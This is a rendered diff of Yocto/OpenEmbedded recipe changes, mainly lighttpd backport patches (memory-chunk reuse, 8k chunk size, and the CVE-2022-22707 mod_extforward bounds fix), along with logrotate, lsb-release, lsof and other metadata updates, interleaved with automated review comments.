6 | (cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337) | ||
7 | |||
8 | (thx flynn) | ||
9 | |||
10 | fix large memory usage for large file downloads from dynamic backends | ||
11 | |||
12 | reuse or release large memory chunks | ||
13 | |||
14 | x-ref: | ||
15 | "Memory Growth with PUT and full buffered streams" | ||
16 | https://redmine.lighttpd.net/issues/3033 | ||
17 | |||
18 | Upstream-Status: Backport | ||
19 | Comment: Hunk refreshed to make it backword compatible. | ||
20 | https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337 | ||
21 | Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com> | ||
22 | |||
23 | --- | ||
24 | src/chunk.c | 99 +++++++++++++++++++++++++++++++++--------- | ||
25 | src/chunk.h | 2 + | ||
26 | src/http-header-glue.c | 2 +- | ||
27 | 3 files changed, 82 insertions(+), 21 deletions(-) | ||
28 | |||
29 | diff --git a/src/chunk.c b/src/chunk.c | ||
30 | index 133308f..d7259b9 100644 | ||
31 | --- a/src/chunk.c | ||
32 | +++ b/src/chunk.c | ||
33 | @@ -28,16 +28,20 @@ | ||
34 | static size_t chunk_buf_sz = 8192; | ||
35 | static chunk *chunks, *chunks_oversized; | ||
36 | static chunk *chunk_buffers; | ||
37 | +static int chunks_oversized_n; | ||
38 | static array *chunkqueue_default_tempdirs = NULL; | ||
39 | static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; | ||
40 | |||
41 | void chunkqueue_set_chunk_size (size_t sz) | ||
42 | { | ||
43 | - chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; | ||
44 | + size_t x = 1024; | ||
45 | + while (x < sz && x < (1u << 30)) x <<= 1; | ||
46 | + chunk_buf_sz = sz > 0 ? x : 8192; | ||
47 | } | ||
48 | |||
49 | void chunkqueue_set_tempdirs_default_reset (void) | ||
50 | { | ||
51 | + chunk_buf_sz = 8192; | ||
52 | chunkqueue_default_tempdirs = NULL; | ||
53 | chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; | ||
54 | } | ||
55 | @@ -120,15 +124,49 @@ static void chunk_free(chunk *c) { | ||
56 | free(c); | ||
57 | } | ||
58 | |||
59 | -buffer * chunk_buffer_acquire(void) { | ||
60 | +static chunk * chunk_pop_oversized(size_t sz) { | ||
61 | + /* future: might have buckets of certain sizes, up to socket buf sizes */ | ||
62 | + if (chunks_oversized && chunks_oversized->mem->size >= sz) { | ||
63 | + --chunks_oversized_n; | ||
64 | + chunk *c = chunks_oversized; | ||
65 | + chunks_oversized = c->next; | ||
66 | + return c; | ||
67 | + } | ||
68 | + return NULL; | ||
69 | +} | ||
70 | + | ||
71 | +static void chunk_push_oversized(chunk * const c, const size_t sz) { | ||
72 | + if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) { | ||
73 | + ++chunks_oversized_n; | ||
74 | + chunk **co = &chunks_oversized; | ||
75 | + while (*co && sz < (*co)->mem->size) co = &(*co)->next; | ||
76 | + c->next = *co; | ||
77 | + *co = c; | ||
78 | + } | ||
79 | + else | ||
80 | + chunk_free(c); | ||
81 | +} | ||
82 | + | ||
83 | +static buffer * chunk_buffer_acquire_sz(size_t sz) { | ||
84 | chunk *c; | ||
85 | buffer *b; | ||
86 | - if (chunks) { | ||
87 | - c = chunks; | ||
88 | - chunks = c->next; | ||
89 | + if (sz <= chunk_buf_sz) { | ||
90 | + if (chunks) { | ||
91 | + c = chunks; | ||
92 | + chunks = c->next; | ||
93 | + } | ||
94 | + else | ||
95 | + c = chunk_init(chunk_buf_sz); | ||
96 | + /* future: might choose to pop from chunks_oversized, if available | ||
97 | + * (even if larger than sz) rather than allocating new chunk | ||
98 | + * (and if doing so, might replace chunks_oversized_n) */ | ||
99 | } | ||
100 | else { | ||
101 | - c = chunk_init(chunk_buf_sz); | ||
102 | + /*(round up to nearest chunk_buf_sz)*/ | ||
103 | + sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); | ||
104 | + c = chunk_pop_oversized(sz); | ||
105 | + if (NULL == c) | ||
106 | + c = chunk_init(sz); | ||
107 | } | ||
108 | c->next = chunk_buffers; | ||
109 | chunk_buffers = c; | ||
110 | @@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) { | ||
111 | return b; | ||
112 | } | ||
113 | |||
114 | +buffer * chunk_buffer_acquire(void) { | ||
115 | + return chunk_buffer_acquire_sz(chunk_buf_sz); | ||
116 | +} | ||
117 | + | ||
118 | void chunk_buffer_release(buffer *b) { | ||
119 | if (NULL == b) return; | ||
120 | - if (b->size >= chunk_buf_sz && chunk_buffers) { | ||
121 | + if (chunk_buffers) { | ||
122 | chunk *c = chunk_buffers; | ||
123 | chunk_buffers = c->next; | ||
124 | c->mem = b; | ||
125 | - c->next = chunks; | ||
126 | - chunks = c; | ||
127 | buffer_clear(b); | ||
128 | + if (b->size == chunk_buf_sz) { | ||
129 | + c->next = chunks; | ||
130 | + chunks = c; | ||
131 | + } | ||
132 | + else if (b->size > chunk_buf_sz) | ||
133 | + chunk_push_oversized(c, b->size); | ||
134 | + else | ||
135 | + chunk_free(c); | ||
136 | } | ||
137 | else { | ||
138 | buffer_free(b); | ||
139 | } | ||
140 | } | ||
141 | |||
142 | +size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) { | ||
143 | + if (sz > chunk_buffer_string_space(b)) { | ||
144 | + sz += b->used ? b->used : 1; | ||
145 | + buffer * const cb = chunk_buffer_acquire_sz(sz); | ||
146 | + /* swap buffer contents and copy original b->ptr into larger b->ptr */ | ||
147 | + /*(this does more than buffer_move())*/ | ||
148 | + buffer tb = *b; | ||
149 | + *b = *cb; | ||
150 | + *cb = tb; | ||
151 | + if ((b->used = tb.used)) | ||
152 | + memcpy(b->ptr, tb.ptr, tb.used); | ||
153 | + chunk_buffer_release(cb); | ||
154 | + } | ||
155 | + return chunk_buffer_string_space(b); | ||
156 | +} | ||
157 | + | ||
158 | static chunk * chunk_acquire(size_t sz) { | ||
159 | if (sz <= chunk_buf_sz) { | ||
160 | if (chunks) { | ||
161 | @@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) { | ||
162 | sz = chunk_buf_sz; | ||
163 | } | ||
164 | else { | ||
165 | - sz = (sz + 8191) & ~8191uL; | ||
166 | - /* future: might have buckets of certain sizes, up to socket buf sizes*/ | ||
167 | - if (chunks_oversized && chunks_oversized->mem->size >= sz) { | ||
168 | - chunk *c = chunks_oversized; | ||
169 | - chunks_oversized = c->next; | ||
170 | - return c; | ||
171 | - } | ||
172 | + /*(round up to nearest chunk_buf_sz)*/ | ||
173 | + sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); | ||
174 | + chunk *c = chunk_pop_oversized(sz); | ||
175 | + if (c) return c; | ||
176 | } | ||
177 | |||
178 | return chunk_init(sz); | ||
179 | @@ -183,10 +244,7 @@ static void chunk_release(chunk *c) { | ||
180 | } | ||
181 | else if (sz > chunk_buf_sz) { | ||
182 | chunk_reset(c); | ||
183 | - chunk **co = &chunks_oversized; | ||
184 | - while (*co && sz < (*co)->mem->size) co = &(*co)->next; | ||
185 | - c->next = *co; | ||
186 | - *co = c; | ||
187 | + chunk_push_oversized(c, sz); | ||
188 | } | ||
189 | else { | ||
190 | chunk_free(c); | ||
191 | @@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void) | ||
192 | chunk_free(c); | ||
193 | } | ||
194 | chunks_oversized = NULL; | ||
195 | + chunks_oversized_n = 0; | ||
196 | } | ||
197 | |||
198 | void chunkqueue_chunk_pool_free(void) | ||
199 | diff --git a/src/chunk.h b/src/chunk.h | ||
200 | index 4c6b7e4..93f343c 100644 | ||
201 | --- a/src/chunk.h | ||
202 | +++ b/src/chunk.h | ||
203 | @@ -50,6 +50,8 @@ typedef struct { | ||
204 | buffer * chunk_buffer_acquire(void); | ||
205 | void chunk_buffer_release(buffer *b); | ||
206 | |||
207 | +size_t chunk_buffer_prepare_append (buffer *b, size_t sz); | ||
208 | + | ||
209 | void chunkqueue_chunk_pool_clear(void); | ||
210 | void chunkqueue_chunk_pool_free(void); | ||
211 | |||
212 | diff --git a/src/http-header-glue.c b/src/http-header-glue.c | ||
213 | index d54f00c..2231fba 100644 | ||
214 | --- a/src/http-header-glue.c | ||
215 | +++ b/src/http-header-glue.c | ||
216 | @@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o | ||
217 | if (avail < toread) { | ||
218 | /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/ | ||
219 | avail = avail ? avail - 1 + toread : toread; | ||
220 | - buffer_string_prepare_append(b, avail); | ||
221 | + avail = chunk_buffer_prepare_append(b, avail); | ||
222 | } | ||
223 | |||
224 | n = read(fd, b->ptr+buffer_string_length(b), avail); | ||
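Review bot: The rounding `sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);` added in `chunk_buffer_acquire_sz()` and `chunk_acquire()` is only correct when `chunk_buf_sz` is a power of two, which now depends on the loop in `chunkqueue_set_chunk_size()`, and nothing at the rounding sites says so. Change the comment at both sites to something like `/*(round up to multiple of chunk_buf_sz; requires chunk_buf_sz to be a power of 2)*/`. Neither that addition nor `sz += b->used ? b->used : 1;` in `chunk_buffer_prepare_append()` guards against `size_t` wrap-around, and whether callers can pass sizes large enough to matter is not visible in these hunks. chunk_acquire() and chunk_release() are only partly shown.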
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch new file mode 100644 index 0000000000..da59b7297a --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch | |||
@@ -0,0 +1,100 @@ | |||
1 | From 27103f3f8b1a2857aa45b889e775435f7daf141f Mon Sep 17 00:00:00 2001 | ||
2 | From: povcfe <povcfe@qq.com> | ||
3 | Date: Wed, 5 Jan 2022 11:11:09 +0000 | ||
4 | Subject: [PATCH] [mod_extforward] fix out-of-bounds (OOB) write (fixes #3134) | ||
5 | |||
6 | (thx povcfe) | ||
7 | |||
8 | (edited: gstrauss) | ||
9 | |||
10 | There is a potential remote denial of service in lighttpd mod_extforward | ||
11 | under specific, non-default and uncommon 32-bit lighttpd mod_extforward | ||
12 | configurations. | ||
13 | |||
14 | Under specific, non-default and uncommon lighttpd mod_extforward | ||
15 | configurations, a remote attacker can trigger a 4-byte out-of-bounds | ||
16 | write of value '-1' to the stack. This is not believed to be exploitable | ||
17 | in any way beyond triggering a crash of the lighttpd server on systems | ||
18 | where the lighttpd server has been built 32-bit and with compiler flags | ||
19 | which enable a stack canary -- gcc/clang -fstack-protector-strong or | ||
20 | -fstack-protector-all, but bug not visible with only -fstack-protector. | ||
21 | |||
22 | With standard lighttpd builds using -O2 optimization on 64-bit x86_64, | ||
23 | this bug has not been observed to cause adverse behavior, even with | ||
24 | gcc/clang -fstack-protector-strong. | ||
25 | |||
26 | For the bug to be reachable, the user must be using a non-default | ||
27 | lighttpd configuration which enables mod_extforward and configures | ||
28 | mod_extforward to accept and parse the "Forwarded" header from a trusted | ||
29 | proxy. At this time, support for RFC7239 Forwarded is not common in CDN | ||
30 | providers or popular web server reverse proxies. It bears repeating that | ||
31 | for the user to desire to configure lighttpd mod_extforward to accept | ||
32 | "Forwarded", the user must also be using a trusted proxy (in front of | ||
33 | lighttpd) which understands and actively modifies the "Forwarded" header | ||
34 | sent to lighttpd. | ||
35 | |||
36 | lighttpd natively supports RFC7239 "Forwarded" | ||
37 | hiawatha natively supports RFC7239 "Forwarded" | ||
38 | |||
39 | nginx can be manually configured to add a "Forwarded" header | ||
40 | https://www.nginx.com/resources/wiki/start/topics/examples/forwarded/ | ||
41 | |||
42 | A 64-bit build of lighttpd on x86_64 (not known to be affected by bug) | ||
43 | in front of another 32-bit lighttpd will detect and reject a malicious | ||
44 | "Forwarded" request header, thereby thwarting an attempt to trigger | ||
45 | this bug in an upstream 32-bit lighttpd. | ||
46 | |||
47 | The following servers currently do not natively support RFC7239 Forwarded: | ||
48 | nginx | ||
49 | apache2 | ||
50 | caddy | ||
51 | node.js | ||
52 | haproxy | ||
53 | squid | ||
54 | varnish-cache | ||
55 | litespeed | ||
56 | |||
57 | Given the general dearth of support for RFC7239 Forwarded in popular | ||
58 | CDNs and web server reverse proxies, and given the prerequisites in | ||
59 | lighttpd mod_extforward needed to reach this bug, the number of lighttpd | ||
60 | servers vulnerable to this bug is estimated to be vanishingly small. | ||
61 | Large systems using reverse proxies are likely running 64-bit lighttpd, | ||
62 | which is not known to be adversely affected by this bug. | ||
63 | |||
64 | In the future, it is desirable for more servers to implement RFC7239 | ||
65 | Forwarded. lighttpd developers would like to thank povcfe for reporting | ||
66 | this bug so that it can be fixed before more CDNs and web servers | ||
67 | implement RFC7239 Forwarded. | ||
68 | |||
69 | x-ref: | ||
70 | "mod_extforward plugin has out-of-bounds (OOB) write of 4-byte -1" | ||
71 | https://redmine.lighttpd.net/issues/3134 | ||
72 | (not yet written or published) | ||
73 | CVE-2022-22707 | ||
74 | |||
75 | Upstream-Status: Backport | ||
76 | CVE: CVE-2022-22707 | ||
77 | Signed-off-by: Ross Burton <ross.burton@arm.com> | ||
78 | |||
79 | Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com> | ||
80 | Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com> | ||
81 | --- | ||
82 | src/mod_extforward.c | 2 +- | ||
83 | 1 file changed, 1 insertion(+), 1 deletion(-) | ||
84 | |||
85 | diff --git a/src/mod_extforward.c b/src/mod_extforward.c | ||
86 | index ba957e04..fdaef7f6 100644 | ||
87 | --- a/src/mod_extforward.c | ||
88 | +++ b/src/mod_extforward.c | ||
89 | @@ -715,7 +715,7 @@ static handler_t mod_extforward_Forwarded (request_st * const r, plugin_data * c | ||
90 | while (s[i] == ' ' || s[i] == '\t') ++i; | ||
91 | if (s[i] == ';') { ++i; continue; } | ||
92 | if (s[i] == ',') { | ||
93 | - if (j >= (int)(sizeof(offsets)/sizeof(int))) break; | ||
94 | + if (j >= (int)(sizeof(offsets)/sizeof(int))-1) break; | ||
95 | offsets[++j] = -1; /*("offset" separating params from next proxy)*/ | ||
96 | ++i; | ||
97 | continue; | ||
98 | -- | ||
99 | 2.25.1 | ||
100 | |||
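Review bot: The `Upstream-Status: Backport` tag on patch line 75 does not say which upstream commit was backported, so the one-line bounds fix below it cannot be checked against its origin from the patch file alone. The `default-chunk-size-8k.patch` added in the same commit records its upstream commit URL; doing the same here, `Upstream-Status: Backport [<upstream lighttpd commit URL>]`, keeps the CVE-2022-22707 fix auditable. The hash on the `From` line is presumably that commit, which should be confirmed rather than assumed. The hunk header names `mod_extforward_Forwarded (request_st * const r, ...)`; whether that matches the 1.4.55 source this recipe builds is not visible here, so it is worth confirming that the patch applies without offset or fuzz.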
diff --git a/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch new file mode 100644 index 0000000000..fd75ca6e26 --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch | |||
@@ -0,0 +1,35 @@ | |||
1 | From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001 | ||
2 | From: Glenn Strauss <gstrauss@gluelogic.com> | ||
3 | Date: Fri, 29 Nov 2019 18:18:52 -0500 | ||
4 | Subject: [PATCH] default chunk size 8k (was 4k) | ||
5 | |||
6 | Upstream-Status: Backport | ||
7 | Comment: No hunk refreshed | ||
8 | https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855 | ||
9 | Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com> | ||
10 | --- | ||
11 | src/chunk.c | 4 ++-- | ||
12 | 1 file changed, 2 insertions(+), 2 deletions(-) | ||
13 | |||
14 | diff --git a/src/chunk.c b/src/chunk.c | ||
15 | index 09dd3f1..133308f 100644 | ||
16 | --- a/src/chunk.c | ||
17 | +++ b/src/chunk.c | ||
18 | @@ -25,7 +25,7 @@ | ||
19 | #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024) | ||
20 | #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024) | ||
21 | |||
22 | -static size_t chunk_buf_sz = 4096; | ||
23 | +static size_t chunk_buf_sz = 8192; | ||
24 | static chunk *chunks, *chunks_oversized; | ||
25 | static chunk *chunk_buffers; | ||
26 | static array *chunkqueue_default_tempdirs = NULL; | ||
27 | @@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; | ||
28 | |||
29 | void chunkqueue_set_chunk_size (size_t sz) | ||
30 | { | ||
31 | - chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096; | ||
32 | + chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; | ||
33 | } | ||
34 | |||
35 | void chunkqueue_set_tempdirs_default_reset (void) | ||
diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb index 7a255ce2f2..357a269015 100644 --- a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb +++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Lightweight high-performance web server" | 1 | SUMMARY = "Lightweight high-performance web server" |
2 | HOMEPAGE = "http://www.lighttpd.net/" | 2 | HOMEPAGE = "http://www.lighttpd.net/" |
3 | DESCRIPTION = "Lightweight high-performance web server is designed and optimized for high performance environments. With a small memory footprint compared to other web-servers, effective management of the cpu-load, and advanced feature set (FastCGI, SCGI, Auth, Output-Compression, URL-Rewriting and many more)" | ||
3 | BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues" | 4 | BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues" |
4 | 5 | ||
5 | LICENSE = "BSD-3-Clause" | 6 | LICENSE = "BSD-3-Clause" |
@@ -13,10 +14,13 @@ RRECOMMENDS_${PN} = "lighttpd-module-access \ | |||
13 | lighttpd-module-accesslog" | 14 | lighttpd-module-accesslog" |
14 | 15 | ||
15 | SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \ | 16 | SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \ |
17 | file://0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch \ | ||
16 | file://index.html.lighttpd \ | 18 | file://index.html.lighttpd \ |
17 | file://lighttpd.conf \ | 19 | file://lighttpd.conf \ |
18 | file://lighttpd \ | 20 | file://lighttpd \ |
19 | file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \ | 21 | file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \ |
22 | file://default-chunk-size-8k.patch \ | ||
23 | file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \ | ||
20 | " | 24 | " |
21 | 25 | ||
22 | SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03" | 26 | SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03" |
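Review bot: The two entries appended to `SRC_URI`, `default-chunk-size-8k.patch` and `0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch`, look order-dependent, but nothing in the recipe says so. Both appear to modify `src/chunk.c` (the 8k patch's context line `static chunk *chunks, *chunks_oversized;` sits next to the code the reuse patch works on), and patches are applied in `SRC_URI` order. A comment above the `SRC_URI` assignment, such as `# default-chunk-size-8k.patch must stay ahead of 0001-core-reuse-large-mem-chunks-*.patch: both touch src/chunk.c`, would stop a later reorder from breaking do_patch. The CVE fix is listed ahead of the non-patch files, which is harmless but separates it from the other patches.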
diff --git a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb index 17f4bf4617..7c1b77add8 100644 --- a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb +++ b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb | |||
@@ -1,6 +1,7 @@ | |||
1 | SUMMARY = "Rotates, compresses, removes and mails system log files" | 1 | SUMMARY = "Rotates, compresses, removes and mails system log files" |
2 | SECTION = "console/utils" | 2 | SECTION = "console/utils" |
3 | HOMEPAGE = "https://github.com/logrotate/logrotate/issues" | 3 | HOMEPAGE = "https://github.com/logrotate/logrotate/" |
4 | DESCRIPTION = "The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files." | ||
4 | LICENSE = "GPLv2" | 5 | LICENSE = "GPLv2" |
5 | 6 | ||
6 | # TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox? | 7 | # TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox? |
@@ -21,6 +22,9 @@ SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/${PV}/${BP}.tar.xz | |||
21 | SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb" | 22 | SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb" |
22 | SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b" | 23 | SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b" |
23 | 24 | ||
25 | # These CVEs are debian, gentoo or SUSE specific on the way logrotate was installed/used | ||
26 | CVE_CHECK_WHITELIST += "CVE-2011-1548 CVE-2011-1549 CVE-2011-1550" | ||
27 | |||
24 | PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}" | 28 | PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}" |
25 | 29 | ||
26 | PACKAGECONFIG[acl] = ",,acl" | 30 | PACKAGECONFIG[acl] = ",,acl" |
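Review bot: The new `CVE_CHECK_WHITELIST` entry suppresses three CVEs under one shared comment, which leaves no per-CVE record of why each one does not apply to this recipe. A whitelist entry silences the CVE check for as long as it stays in the recipe, so each ID should carry its own justification and a pointer to the evidence, for example `# CVE-2011-1548: <distribution-specific condition, link to advisory>` on the line above. The existing comment also reads awkwardly; `# These CVEs depend on how Debian, Gentoo or SUSE installed and used logrotate` says the same thing more clearly.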
diff --git a/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch new file mode 100644 index 0000000000..f32cd18370 --- /dev/null +++ b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch | |||
@@ -0,0 +1,27 @@ | |||
1 | lsb-release maintains it's own copy of help2man. Include the support | ||
2 | for specifying SOURCE_DATE_EPOCH from upstream. | ||
3 | |||
4 | Upstream-Status: Pending | ||
5 | |||
6 | Signed-off-by: Anuj Mittal <anuj.mittal@intel.com> | ||
7 | |||
8 | diff --git a/help2man b/help2man | ||
9 | index 13015c2..63439db 100755 | ||
10 | --- a/help2man | ||
11 | +++ b/help2man | ||
12 | @@ -173,7 +173,14 @@ my ($help_text, $version_text) = map { | ||
13 | or die "$this_program: can't get `--$_' info from $ARGV[0]\n" | ||
14 | } qw(help), $opt_version_key; | ||
15 | |||
16 | -my $date = strftime "%B %Y", localtime; | ||
17 | +my $epoch_secs = time; | ||
18 | +if (exists $ENV{SOURCE_DATE_EPOCH} and $ENV{SOURCE_DATE_EPOCH} =~ /^(\d+)$/) | ||
19 | +{ | ||
20 | + $epoch_secs = $1; | ||
21 | + $ENV{TZ} = 'UTC0'; | ||
22 | +} | ||
23 | + | ||
24 | +my $date = strftime "%B %Y", localtime $epoch_secs; | ||
25 | (my $program = $ARGV[0]) =~ s!.*/!!; | ||
26 | my $package = $program; | ||
27 | my $version; | ||
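Review bot: A `SOURCE_DATE_EPOCH` that is set but not purely digits is silently ignored by the new `if` at patch lines 18-22, and the man page date falls back to the current time, so the build stops being reproducible without any sign of it. A branch that reports it, e.g. `elsif (exists $ENV{SOURCE_DATE_EPOCH}) { warn "$this_program: ignoring invalid SOURCE_DATE_EPOCH\n" }`, would make that visible. Separately, the header says the change is taken from upstream help2man while the tag reads `Upstream-Status: Pending`; if the tag refers to lsb-release upstream, saying so in the description avoids the apparent contradiction.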
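--- a/meta/recipes-extended/lsb/lsb-release_1.4.bb
+++ b/meta/recipes-extended/lsb/lsb-release_1.4.bb
@@ -11,6 +11,7 @@ LIC_FILES_CHKSUM = "file://README;md5=12da544b1a3a5a1795a21160b49471cf"
 SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar.gz \
 file://0001-fix-lsb_release-to-work-with-busybox-head-and-find.patch \
 file://0001-Remove-timestamp-from-manpage.patch \
+file://help2man-reproducibility.patch \
 "
 
 SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4"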
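--- a/meta/recipes-extended/lsof/lsof_4.91.bb
+++ b/meta/recipes-extended/lsof/lsof_4.91.bb
@@ -3,7 +3,7 @@ DESCRIPTION = "Lsof is a Unix-specific diagnostic tool. \
 Its name stands for LiSt Open Files, and it does just that."
 HOMEPAGE = "http://people.freebsd.org/~abe/"
 SECTION = "devel"
-LICENSE = "BSD"
+LICENSE = "Spencer-94"
 LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a"
 
 # Upstream lsof releases are hosted on an ftp server which times out download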
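--- a/meta/recipes-extended/ltp/ltp_20200120.bb
+++ b/meta/recipes-extended/ltp/ltp_20200120.bb
@@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__"
 CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__"
 SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5"
 
-SRC_URI = "git://github.com/linux-test-project/ltp.git \
+SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \
 file://0001-build-Add-option-to-select-libc-implementation.patch \
 file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \
 file://0004-guard-mallocopt-with-__GLIBC__.patch \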
diff --git a/meta/recipes-extended/lzip/lzip_1.21.bb b/meta/recipes-extended/lzip/lzip_1.21.bb index bb3d2a6fe3..bd1c007de6 100644 --- a/meta/recipes-extended/lzip/lzip_1.21.bb +++ b/meta/recipes-extended/lzip/lzip_1.21.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Lossless data compressor based on the LZMA algorithm" | 1 | SUMMARY = "Lossless data compressor based on the LZMA algorithm" |
2 | HOMEPAGE = "http://lzip.nongnu.org/lzip.html" | 2 | HOMEPAGE = "http://lzip.nongnu.org/lzip.html" |
3 | DESCRIPTION = "Lzip is a lossless data compressor with a user interface similar to the one of gzip or bzip2. Lzip uses a simplified form of the Lempel-Ziv-Markov chain-Algorithm (LZMA) stream format, chosen to maximize safety and interoperability." | ||
3 | SECTION = "console/utils" | 4 | SECTION = "console/utils" |
4 | LICENSE = "GPLv2+" | 5 | LICENSE = "GPLv2+" |
5 | LIC_FILES_CHKSUM = "file://COPYING;md5=76d6e300ffd8fb9d18bd9b136a9bba13 \ | 6 | LIC_FILES_CHKSUM = "file://COPYING;md5=76d6e300ffd8fb9d18bd9b136a9bba13 \ |
diff --git a/meta/recipes-extended/man-db/man-db_2.9.0.bb b/meta/recipes-extended/man-db/man-db_2.9.0.bb index 333fbfa76d..7a30f9d722 100644 --- a/meta/recipes-extended/man-db/man-db_2.9.0.bb +++ b/meta/recipes-extended/man-db/man-db_2.9.0.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "An implementation of the standard Unix documentation system accessed using the man command" | 1 | SUMMARY = "An implementation of the standard Unix documentation system accessed using the man command" |
2 | HOMEPAGE = "http://man-db.nongnu.org/" | 2 | HOMEPAGE = "http://man-db.nongnu.org/" |
3 | DESCRIPTION = "man-db is an implementation of the standard Unix documentation system accessed using the man command. It uses a Berkeley DB database in place of the traditional flat-text whatis databases." | ||
3 | LICENSE = "LGPLv2.1 & GPLv2" | 4 | LICENSE = "LGPLv2.1 & GPLv2" |
4 | LIC_FILES_CHKSUM = "file://docs/COPYING.LIB;md5=a6f89e2100d9b6cdffcea4f398e37343 \ | 5 | LIC_FILES_CHKSUM = "file://docs/COPYING.LIB;md5=a6f89e2100d9b6cdffcea4f398e37343 \ |
5 | file://docs/COPYING;md5=eb723b61539feef013de476e68b5c50a" | 6 | file://docs/COPYING;md5=eb723b61539feef013de476e68b5c50a" |
diff --git a/meta/recipes-extended/mc/mc_4.8.23.bb b/meta/recipes-extended/mc/mc_4.8.23.bb index ead348b92e..8e3b7a65e0 100644 --- a/meta/recipes-extended/mc/mc_4.8.23.bb +++ b/meta/recipes-extended/mc/mc_4.8.23.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Midnight Commander is an ncurses based file manager" | 1 | SUMMARY = "Midnight Commander is an ncurses based file manager" |
2 | HOMEPAGE = "http://www.midnight-commander.org/" | 2 | HOMEPAGE = "http://www.midnight-commander.org/" |
3 | DESCRIPTION = "GNU Midnight Commander is a visual file manager, licensed under GNU General Public License and therefore qualifies as Free Software. It's a feature rich full-screen text mode application that allows you to copy, move and delete files and whole directory trees, search for files and run commands in the subshell. Internal viewer and editor are included." | ||
